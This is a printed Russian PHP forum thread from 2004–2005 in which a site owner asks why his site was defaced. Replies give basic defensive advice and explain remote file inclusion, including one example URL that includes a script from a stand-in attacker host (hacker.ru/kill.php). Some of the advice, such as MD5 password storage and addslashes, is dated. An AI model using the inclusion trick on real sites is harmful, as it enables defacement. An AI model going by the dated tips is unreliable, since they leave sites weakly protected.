Версия для печати темы
Нажмите сюда для просмотра этой темы в оригинальном формате
Форум программистов > PHP: Общие вопросы > Проверка скрипта


Автор: Гость_Сергей 14.7.2004, 08:42
Мой сайт несколько раз ломали, хостер говорит, что у меня дыра в пхп скриптах. Кто знает как можно проверить скрипты (подскажите прогу), или вохможные советы по безопастности. Спасибо!

Автор: Ignat 14.7.2004, 10:12
скрипты нужно писать под register_globals=off;
пароли хранить после шифровки MD5;
отслеживать типы файлов в аплоаде;
все данные которые постятся подвергать htmlspecialchars и addslashes;
для пущей безопасности можно вести в базе логи неудачных попыток ввода пароля, определять ip, частоту ввода пароля.

и просто не использовать элементарные пароли, типа qwerty, 1111.

Автор: MuToGeN 14.7.2004, 11:32
Насчет программ - таких не знаю.
Если готовы заплатить за это денег, то можете обратиться с этим вопросом в раздел "работа".

Автор: Secandr 14.7.2004, 12:08
Ignat
На моём сайте на админа стоял пароль qwerty и ничего за два года попыток, взлом не удался. А брутфорсили дай боже biggrin.gif

Гость_Сергей Хорошие советы дал Ignat, если опишите что и как ваша программа делает, то можно будет дать более подробные советы.

MuToGeN
Я видел такие программы, но работаю они скверно, даже не находят спеуиально оставленых дырок.

Автор: MuToGeN 14.7.2004, 14:59
Secandr
пароль qwerty, а логин admin_VcK923MRpfKl ? =)

К тому, что посоветывал Ignat:
С большими проектами бывает полезно логировать ошибочные запросы и банить по IP, если таких запросов, например, больше 5 разных в минуту от одного клиента. Вполне можно сделать вывод, что тот ищет уязвимость с SQL инъекцией.

Автор: Secandr 15.7.2004, 10:05
Ещё вариант: проверять $_GET и $_POST на лишние параметры и если они есть делать die. А если таких запросов много - банить ip.

MuToGeN
Логин был Secandr

Автор: dm9 15.7.2004, 20:08
Небольшая коллекция на тему "security in php". Что-то по этим статьям можно начать понимать...

http://docs.com.ru/php_6.php
http://docs.com.ru/php_6.php
http://russian.colossus.net/manual/man3.shtml
http://www.compdoc.ru/internet/php/safeprog/
http://www.compdoc.ru/internet/php/criticality_scrips/
http://detail.phpclub.net/article/php_security1
http://detail.phpclub.net/article/php_security2
http://www.atlant.ru/comar/lib/ogr12/art82/

Автор: Гость_Сергей 16.7.2004, 20:14
Спасибо всем, проблемма в том, что весь сайт написан на пхп и хакер каким то способом без подключения по фтп к серверу изменил картинки и содержание главной страницы, особых скриптов на сайте нет, только использовал пхп для создания верхушки и низа, потом везде вставлял. Еще сам написал новостную ленту с архивом, кто подскажет, как он смог закачать картинки без фтп. Жду, спасибо! exclamation.gif

Автор: Secandr 16.7.2004, 21:31
Твои скрипты в файлы пишут что-либо?
Если да, то как формируются имена этих файлов?
Если динамически, то переписывай скрипты.

Автор: Гость_СЕргей 17.7.2004, 05:43
У меня база новостей текстовой файл!!!

Автор: Ripper 17.7.2004, 09:24
ну если ссылка типа http://mysite.ru/index.php?news.php
то так нельзя. Если у тебя берется имя вставляемого файла из строки адреса то он может прописать http://mysite.ru/index.php?http://hacker.ru/kill.php типа того

Автор: Secandr 17.7.2004, 18:52
смысл в том, что если действия пользователя могут повлеять на имя файла и его содержимое, то злоумышленик просто создаст hack.php, а в него запишетнормаьлный аплоадерщик и будет менять всё на твоём сайте, да и на хосте сможет много чего натворить.

Автор: dm9 17.7.2004, 22:03
Гость_СЕргей, коли не коммерческая тайна и не больше сотни строк, кинь сюда скрипты, мне было бы интересно посмотреть. Может, и найдётся баг...
Добавлено @ 22:05
Да мы ж тут не ясновидящие, так гадать можно долго без кода...

Автор: LonelyWolf 7.9.2005, 09:49
Да долго годать и не придёться...

1) Гость_Сергей, у тебя есть в админке где ты добовляешь новости upload например для картинок в новости?????

2) Доступ в админку по технологи отдельная страничка логин и пасс...в папке например admin
а пароль с логином храниться в отдельном файле в той же папке и имеет имя типа pass.dat =)

3) Как уже говорили у тебя происходит внешний инклуд файла с новостями в открытом виде...

Как в большинстве случаев.....поиметь такой сайт 1.5-3 минуты....

Да зачем просить выложить код....и что щас поможем исправим за него багу, а в следующий раз его сломают он опять кого-нибудь будет просить...надо самому....тогда и ошибок меньше будет...

Автор: Ignat 7.9.2005, 13:49
LonelyWolf, ты б еще дольше думал smile
Больше года прошло.

Автор: Opik 7.9.2005, 20:09
http://forum.vingrad.ru/index.php?showtopic=38887

Автор: -=Ustas=- 8.9.2005, 09:25
smile Вскрытие архива...

Powered by Invision Power Board (http://www.invisionboard.com)
© Invision Power Services (http://www.invisionpower.com)